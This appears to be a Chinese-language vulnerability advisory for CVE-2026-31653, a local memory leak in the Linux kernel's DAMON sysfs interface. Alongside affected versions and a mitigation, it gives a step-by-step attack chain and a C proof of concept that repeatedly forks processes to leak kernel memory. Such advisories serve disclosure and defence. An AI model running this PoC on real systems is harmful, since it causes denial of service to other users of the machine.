IPBUF安全漏洞报告
English
CVE-2026-31653 CVSS 5.5 中危

Linux内核DAMON内存泄漏漏洞CVE-2026-31653

披露日期: 2026-04-24
来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号
CVE-2026-31653
漏洞类型
内存泄漏
CVSS评分
5.5 中危
攻击向量
本地 (AV:L)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Linux Kernel

相关标签

Linux KernelMemory LeakDAMONDoSLocalRace Condition

漏洞概述

Linux内核的DAMON sysfs接口存在内存泄漏漏洞。当`damon_call`调用失败时,例如在`kdamond`停止或目标进程终止的情况下,未能释放动态分配的`repeat_call_control`结构体。攻击者可利用此漏洞导致内核内存资源耗尽,从而引发拒绝服务风险。

技术细节

该漏洞源于Linux内核`mm/damon/sysfs`中的错误处理逻辑缺失。在调用`damon_call()`之前,系统会为`repeat_call_control`分配内存。如果`kdamond`在此调用完成前停止(如被监控进程立即退出),函数将返回错误。然而,原始代码的错误路径缺少对该内存块的释放操作。这导致每次触发该条件时都会发生内存泄漏。本地攻击者可通过反复触发该场景,消耗大量内核内存,最终导致系统崩溃或拒绝服务。

攻击链分析

STEP 1
步骤1
攻击者获取本地低权限用户访问权限。
STEP 2
步骤2
攻击者利用DAMON sysfs接口配置监控上下文,并设置一个容易立即终止的目标进程。
STEP 3
步骤3
触发监控启动(damon_call),但在调用完成前立即终止目标进程或停止kdamond。
STEP 4
步骤4
内核未能释放分配给repeat_call_control的内存,导致内存泄漏。
STEP 5
步骤5
攻击者反复执行上述操作,耗尽系统内存,导致拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
/* * PoC for CVE-2026-31653: Linux Kernel DAMON sysfs Memory Leak * This script attempts to trigger the race condition where * kdamond stops before damon_call() deallocates repeat_call_control. */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/syscall.h> #include <string.h> #define DAMON_SYSFS_DIR "/sys/kernel/mm/damon/admin" void trigger_leak() { FILE *fp; char pid_str[32]; snprintf(pid_str, sizeof(pid_str), "%d", getpid()); // 1. Create a DAMON context targeting the current process fp = fopen(DAMON_SYSFS_DIR "/kdamonds/nr_kdamonds", "w"); if (fp) { fprintf(fp, "1"); fclose(fp); } // 2. Configure target pid (simulate the vulnerable scenario) fp = fopen(DAMON_SYSFS_DIR "/kdamonds/0/contexts/0/targets/nr_targets", "w"); if (fp) { fprintf(fp, "1"); fclose(fp); } fp = fopen(DAMON_SYSFS_DIR "/kdamonds/0/contexts/0/targets/0/pid_target", "w"); if (fp) { fprintf(fp, "%s", pid_str); fclose(fp); } // 3. Turn on kdamond fp = fopen(DAMON_SYSFS_DIR "/kdamonds/0/state", "w"); if (fp) { fprintf(fp, "on"); fclose(fp); } // 4. Immediately exit the process to trigger the race condition // This causes kdamond to stop while repeat_call_control might be active exit(0); } int main() { printf("Starting PoC for CVE-2026-31653...\n"); // Loop to increase memory leak impact for (int i = 0; i < 100; i++) { if (fork() == 0) { trigger_leak(); } usleep(10000); } return 0; }

影响范围

Linux Kernel < v5.10.y (特定补丁前)
Linux Kernel < v5.15.y (特定补丁前)
Linux Kernel < v6.1.y (特定补丁前)
Linux Kernel < v6.6.y (特定补丁前)

防御指南

临时缓解措施
建议临时禁用DAMON功能或通过内核参数限制对sysfs中DAMON配置的访问,直至完成内核升级。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表